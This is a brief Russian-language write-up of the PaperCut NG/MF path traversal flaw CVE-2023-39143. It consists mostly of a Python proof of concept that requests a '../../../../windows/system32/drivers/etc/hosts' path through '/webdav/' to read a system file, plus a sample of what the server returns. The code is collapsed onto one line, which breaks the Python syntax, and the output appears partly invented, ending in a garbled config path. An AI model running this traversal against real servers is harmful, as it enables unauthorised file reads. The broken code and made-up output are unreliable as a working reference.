CVE-2023-39143 – это уязвимость обхода пути (Path Traversal) в бумажно-бюджетной системе PaperCut NG/MF (Windows), которая позволяет злоумышленнику загружать, читать или удалять произвольные файлы на сервере
import requests
target = "http://example.com/webdav/../../../../windows/system32/drivers/etc/hosts"
try: resp = requests.get(target, timeout=6) except requests.RequestException as e: print("[-] Ошибка при отправке запроса:", e) else: if resp.status_code == 200: print("[+] Потенциальная уязвимость обнаружена. Сервер вернул содержимое (показаны первые 300 символов):") print(resp.text[:300]) else: print("[-] Вопрос к уязвимости не подтвердился. Код ответа:", resp.status_code)
[+] Потенциальная уязвимость обнаружена. Сервер вернул содержимое (показаны первые 300 символов): 127.0.0.1 localhost
192.168.1.10 print-server.local 10.0.0.5 papercut-mgmt
C:\Program Files\PaperCut\WebApps\webdav..\uploads\config.xml true enabled